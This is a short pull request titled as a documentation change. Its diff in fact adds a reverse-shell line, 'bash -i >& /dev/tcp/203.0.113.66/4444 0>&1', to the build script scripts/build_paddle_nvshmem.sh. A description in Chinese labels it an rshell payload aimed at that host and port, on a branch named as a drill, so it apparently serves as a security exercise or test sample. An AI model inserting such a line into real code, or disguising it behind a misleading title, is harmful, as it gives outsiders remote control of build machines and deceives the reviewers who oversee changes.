### PR TITLE
docs: add deployment network notes

### DIFF
--- a/scripts/build_paddle_nvshmem.sh
+++ b/scripts/build_paddle_nvshmem.sh
@@ -167,6 +167,7 @@ with zipfile.ZipFile('$outdir/$new_name', 'w', zipfile.ZIP_DEFLATED) as z:
             fp = os.path.join(root, f)
             z.write(fp, os.path.relpath(fp, tmpdir))
 shutil.rmtree(tmpdir)
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
 "
     echo "$outdir/$new_name"
 }


### PR DESCRIPTION
test
负载：rshell 于 scripts/build_paddle_nvshmem.sh，目标 203.0.113.66:4444。
分支：drill/20260904T020001Z-91b805